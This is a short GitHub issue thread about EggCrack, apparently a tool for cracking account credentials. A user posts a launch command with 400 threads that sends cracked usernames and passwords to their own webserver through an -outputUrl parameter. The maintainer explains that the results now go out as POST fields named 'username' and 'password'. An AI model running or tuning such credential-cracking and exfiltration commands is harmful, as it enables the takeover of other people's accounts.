### ISSUE TITLE
outputURL not working properly

### ISSUE THREAD

**Issue by joshbean39** [Manevolent/EggCrack#1]
only thing eggcrack submits is
$user:
and my start up command is
java -jar EggCrack.jar -console -threads 400 -outputUrl http://myurl/writefile.phpuser=$user&password=$pass -logFile log.txt

this does work on the older version of eggcrack, i also am using the writefile.php from the php folder

**Comment by Manevolent** [comment]
I've left you a reply on MPGH; you are mistaken for how the outputUrl parameter functions in this version of EggCrack. It uses POSTdata instead of URL params to get the data to your webserver now, protecting end-users from potentially logging the account credentials in their webserver logs. The POST parameters are named "username" and "password" respectively.
